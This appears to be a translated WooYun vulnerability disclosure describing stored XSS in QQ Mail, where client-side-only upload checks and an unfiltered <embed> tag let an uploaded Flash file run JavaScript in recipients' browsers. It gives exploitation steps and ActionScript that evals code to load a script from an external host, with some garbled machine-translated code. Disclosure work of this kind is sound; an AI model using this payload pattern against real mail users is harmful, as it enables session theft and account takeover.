XSS in QQ mail, which can call external javascript files

 

Brief description:

This is an old vulnerability that was previously reported. After consulting wooyun, I replied that I could submit the vulnerability. So I submitted the vulnerability and wanted to earn Rank!

 

Vulnerability: QQ mail does not filter the uploaded images and the file type. In addition, it does not filter HTML tags <embed>. If two combinations are used, FLASH files can be uploaded, use FLASH to call any javascript file.

Detailed description:

Major causes of vulnerabilities:

 

1. Only the client determines the upload of image attachments and does not make any judgment on the server. we can bypass the restriction to upload any types of files (this is mainly used to upload flash files ~)!

2. there is a problem with HTML filtering. When src = relative path in <embed src = "relative path" type = "application/x-shockwave-flash"> </embed>, the embed tag will not be filtered out!

 

Proof of vulnerability:

The following describes how to exploit the vulnerability!

 

1. The file type is only verified on the client. When I upload an Image Attachment location in my QQ mailbox and upload a FLASH file, the following prompt will be displayed!

 

 

 

2. packet capture analysis, you can find that when this prompt appears, there is no data request, that is, the client makes a judgment!

 

3. Since the client only makes a judgment, we can upload other types of files on our own (how to bypass the client restrictions is not mentioned here ). Result: All types of images except images can be uploaded. So we upload a FLASH file of our own.

 

 

On the uploaded page, you can find the address of the uploaded FLASH file.

 

4. write emails, switch to HTML mode, and write the following content

 

<Embed src = "the copied FLASH file address" type = "application/x-shockwave-flash"> </embed>

</img>

 

5. Send the email. After the recipient clicks the email, the effect is as follows (IE, chrome, and FF are all valid ):

 

 

 

 

6. Because the <embed> tag does not contain allowscriptaccess and allownetworking to control the FLASH permission! Therefore, using flash to execute JS Code is not restricted.

 

Finally, the AS code of FLASH is attached:

 

Package {

Import flash. display. Sprite;

Import flash. external. ExternalInterface;

Public class QQmailTest extends Sprite

{

Public function QQmailTest ()

{

If (flash. external. ExternalInterface. available ){

Flash. external. externalInterface. call ("eval", "(function () {var s = document. createElement ('script'); s. type = 'text/javascript '; s. src = 'HTTP: // www.toolmao.com/tool/qqmail.js'?document.body.appendchild (s );})()");

}

}

}

}

 

Solution:

The vulnerability has been fixed by the vendor.

 

 

Author gainover @ wooyun